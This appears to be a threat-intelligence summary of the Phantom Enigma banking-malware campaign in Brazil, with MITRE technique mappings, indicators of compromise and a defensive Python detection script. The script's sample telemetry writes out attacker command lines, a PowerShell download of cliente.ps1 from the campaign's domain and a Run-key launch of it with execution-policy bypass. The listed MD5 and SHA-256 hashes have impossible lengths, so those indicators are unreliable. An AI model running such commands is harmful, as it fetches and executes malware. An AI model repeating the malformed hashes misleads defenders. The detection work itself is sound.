Operation Phantom Enigma

A malicious campaign named Phantom Enigma targets Brazilian users primarily through phishing emails that distribute malicious browser extensions and Mesh Agent malware. The attackers send the phishing emails from compromised company servers and deploy PowerShell and BAT scripts to capture banking credentials, focusing on Banco do Brasil customers. #PhantomEnigma #MeshAgent #BancoDoBrasil

Key points

  • The Phantom Enigma campaign has been active since early 2025, mainly targeting users in Brazil but also affecting companies in Colombia, Czech Republic, Mexico, Russia, Vietnam, and others.
  • Attackers distribute malware via phishing emails that either contain malicious attachments or links directing victims to download files from attacker-controlled open directories.
  • The campaign uses a malicious browser extension for Google Chrome, Microsoft Edge, and Brave browsers to intercept and steal sensitive banking information, specifically targeting Banco do Brasil customers.
  • Two main attack chains are used: one deploying malicious browser extensions and the other involving remote administration malware like Mesh Agent and PDQ Connect Agent for wider network compromise.
  • The malicious PowerShell and BAT scripts perform virtualization checks, disable User Account Control (UAC), maintain persistence via registry modifications and shortcut alterations, and communicate with C2 servers to receive instructions.
  • Attack infrastructure includes multiple malicious domains and IP addresses, some sharing TLS certificates, facilitating stealthy command and control and data exfiltration.
  • Approximately 70 unique victim companies were identified, and the malicious extension was downloaded over 700 times from the Chrome Web Store before removal.
  • Attackers abuse compromised companies’ servers to send phishing emails, which increases the infection success rate; the campaign’s end goal is the theft of Brazilian bank authentication credentials.

MITRE Techniques

  • [T1583.001] Acquire Infrastructure: Domains – Attackers used domains such as .clientepj.com to host open directories for malware distribution (“domains .clientepj.com for the open directory”).
  • [T1583.004] Acquire Infrastructure: Server – Attackers acquired hosting services and set up web servers to distribute malware (“acquired a hosting service and set up a web server”).
  • [T1588.001] Obtain Capabilities: Malware – Development of PowerShell and BAT scripts to install malicious browser extensions (“attackers developed PowerShell and BAT scripts”).
  • [T1608.001] Stage Capabilities: Upload Malware – Malicious files including PowerShell scripts were placed in open directories during the attack (“placed malicious files in the open directory”).
  • [T1585.002] Establish Accounts: Email Accounts – Use of pre-created Gmail accounts to distribute phishing emails (“attackers used pre-created Gmail accounts”).
  • [T1566.001] Phishing: Spearphishing Attachment – Phishing emails contained malicious archives prompting victims to execute them (“phishing emails containing a malicious archive”).
  • [T1566.002] Phishing: Spearphishing Link – Phishing emails with links to download malicious files from attacker-controlled sites (“phishing emails with a link to download a malicious file”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell scripts executed to install malicious extensions (“executed a PowerShell script to load a malicious extension”).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – BAT scripts used to check system services and download PowerShell scripts (“BAT scripts checking Warsaw Technology presence”).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – JavaScript code modified browser shortcuts to load malicious extensions (“used JavaScript code to modify LNK files”).
  • [T1204.002] User Execution: Malicious File – Victims required to execute one of several file types to trigger the attack (“victim run a file in one of three formats”).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence gained via registry key PWSecurity added to startup (“adds itself to the startup by modifying registry”).
  • [T1547.009] Boot or Logon Autostart Execution: Shortcut Modification – Modified LNK files to launch browsers with malicious extensions (“used LNK files to launch browsers and deploy extension”).
  • [T1176] Browser Extensions – Malicious browser extension used to collect and exfiltrate victim data (“used a malicious browser extension”).
  • [T1546.016] Event Triggered Execution: Installer Packages – Malicious MSI files signed to masquerade as legitimate applications (“signed malicious files as government ministry app”).
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – Scripts check for virtualization environments to evade analysis (“used PowerShell to check for virtualization”).
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control – Script disables UAC for stealthy execution (“disable UAC by changing EnableLUA registry value”).
  • [T1036.001] Masquerading: Invalid Code Signature – Use of fake digital signatures to disguise malware (“signed malicious files to disguise”).
  • [T1070.004] Indicator Removal: File Deletion – REMOVEKL command removes script files and terminates processes (“attackers used REMOVEKL to delete scripts”).
  • [T1070.009] Indicator Removal: Clear Persistence – Removal of autostart registry values to clear persistence (“attackers used REMOVEKL command”).
  • [T1007] System Service Discovery – BAT script checks for presence of Warsaw Technology service to identify Brazilian targets (“check for Warsaw Technology”).
  • [T1083] File and Directory Discovery – JavaScript scans user directories to find and modify browser shortcut files (“used JavaScript to scan user directories for .lnk files”).
  • [T1056.003] Input Capture: Web Portal Capture – Malicious extension captures user input from banking web portals (“used extension to collect data from banking systems”).
  • [T1071.001] Application Layer Protocol: Web Protocols – HTTP protocol used for command and control communication (“used HTTP protocol to transmit stolen data”).
  • [T1105] Ingress Tool Transfer – PowerShell downloads additional scripts from attacker servers (“Invoke-WebRequest used to download PowerShell script”).

Indicators of Compromise

  • [IP Address] Command and control and malware hosting – 142.54.185.178, 107.174.231.26
  • [Domain] Malicious infrastructure domains used for hosting and control – computadorpj.com, clientepj.com, financial-executive.com, atual2025.com, ranchocentral.com, servidor2025.com
  • [File Hashes] Malicious installer and script samples – examples include MD5: 0353a0dbc9f016da09303ee1a3b75d2f57, SHA-256: 5354498bae3cce0cbe6a0227ed33fe566f0e8fe4780f2a57743acc98f6859740d
  • [File Names] Malicious script and extension files – cliente.ps1 (PowerShell script), cliente.bat (BAT script), nplfchpahihleeejpjmodggckakhglee (malicious Chrome extension ID)
  • [URLs] Malicious phishing and C2 URLs – https://enota.clientepj.com/cliente.ps1, https://financial-executive.com/comando_temporario.php
  • [Extension IDs] Malicious Chrome Web Store extension identifiers – nplfchpahihleeejpjmodggckakhglee, cckjdiimhlanonhceggkfjlmjnenpmfm, lkpiodmpjdhhhkdhdbnncigggodgdfli
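The techniques and indicators listed above translate directly into host-triage logic. The following is an added example written for this summary, not code from the PT Security report: it runs the page’s IoCs (domains, IPs, extension IDs, script file names) and the described behaviours (EnableLUA set to 0, a Run-key value named PWSecurity, browser shortcuts or launches that load an unpacked extension) against exported endpoint telemetry. The telemetry records are constructed samples, and the use of Chrome’s `--load-extension` switch is an assumption; the report only states that LNK files were modified to launch the browser with the extension.

```python
"""Phantom Enigma triage over exported endpoint telemetry (added example)."""
import re

# Indicators taken from the summary above.
IOC_DOMAINS = {"computadorpj.com", "clientepj.com", "financial-executive.com",
               "atual2025.com", "ranchocentral.com", "servidor2025.com"}
IOC_IPS = {"142.54.185.178", "107.174.231.26"}
IOC_EXTENSION_IDS = {"nplfchpahihleeejpjmodggckakhglee",
                     "cckjdiimhlanonhceggkfjlmjnenpmfm",
                     "lkpiodmpjdhhhkdhdbnncigggodgdfli"}
IOC_FILENAMES = {"cliente.ps1", "cliente.bat"}

# Registry locations named by the behaviours above (compared case-insensitively).
RUN_KEY = r"\microsoft\windows\currentversion\run"
UAC_KEY = r"\microsoft\windows\currentversion\policies\system"


def domain_matches(host):
    """True for a listed domain or any subdomain of it (e.g. enota.clientepj.com)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def check_command_line(cmdline):
    """Flag extension loading, known script names and downloads from known infra."""
    findings = []
    low = cmdline.lower()
    # Assumption: the modified shortcuts pass --load-extension (not stated on the page).
    if "--load-extension" in low:
        findings.append("T1547.009/T1176 browser launched with --load-extension")
    for ext in sorted(IOC_EXTENSION_IDS):
        if ext in low:
            findings.append(f"T1176 known malicious extension ID {ext}")
    for name in sorted(IOC_FILENAMES):
        if name in low:
            findings.append(f"T1059 known script file name {name}")
    # Hosts of any URL on the command line (Invoke-WebRequest downloads, etc.).
    for host in re.findall(r"https?://([^/\s\"']+)", cmdline, re.I):
        if domain_matches(host) or host in IOC_IPS:
            findings.append(f"T1105 download from known infrastructure {host}")
    return findings


def check_registry(event):
    """event: dict with 'key', 'value_name', 'data' (a registry set-value record)."""
    findings = []
    key = event.get("key", "").lower()
    if key.endswith(UAC_KEY) and event.get("value_name") == "EnableLUA" \
            and str(event.get("data")) == "0":
        findings.append("T1548.002 UAC disabled via EnableLUA=0")
    if key.endswith(RUN_KEY):
        if event.get("value_name") == "PWSecurity":
            findings.append("T1547.001 Run-key persistence 'PWSecurity'")
        # The autostart command itself may reference the known scripts.
        findings.extend(check_command_line(str(event.get("data", ""))))
    return findings


def check_network(event):
    host = event.get("host", "")
    if domain_matches(host) or host in IOC_IPS:
        return [f"T1071.001 contact with known infrastructure {host}"]
    return []


def triage(events):
    """Return {event_id: [findings]} for every event that matched something."""
    handlers = {
        "registry": check_registry,
        "process": lambda ev: check_command_line(ev["cmdline"]),
        "network": check_network,
    }
    report = {}
    for ev in events:
        findings = handlers.get(ev["type"], lambda ev: [])(ev)
        if findings:
            report[ev["id"]] = findings
    return report


# Constructed sample telemetry (not from the report); ids 6 and 7 are benign.
SAMPLE_EVENTS = [
    {"id": 1, "type": "registry",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "value_name": "EnableLUA", "data": 0},
    {"id": 2, "type": "registry",
     "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "PWSecurity",
     "data": r"powershell -ep bypass -f C:\Users\Public\cliente.ps1"},
    {"id": 3, "type": "process",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                r'--load-extension="C:\Users\Public\nplfchpahihleeejpjmodggckakhglee"'},
    {"id": 4, "type": "process",
     "cmdline": "powershell.exe Invoke-WebRequest https://enota.clientepj.com/cliente.ps1 "
                "-OutFile cliente.ps1"},
    {"id": 5, "type": "network", "host": "financial-executive.com"},
    {"id": 6, "type": "network", "host": "www.bb.com.br"},
    {"id": 7, "type": "registry",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "value_name": "EnableLUA", "data": 1},
]

if __name__ == "__main__":
    for event_id, findings in sorted(triage(SAMPLE_EVENTS).items()):
        print(event_id, findings)
```

Domain matching is suffix-based so that subdomains such as the `enota.clientepj.com` download host are caught, while the benign Banco do Brasil host and an EnableLUA value of 1 produce no findings. The same functions can be pointed at real Sysmon or EDR exports once the records are normalised to the three event shapes used here.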

Read more: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/operation-phantom-enigma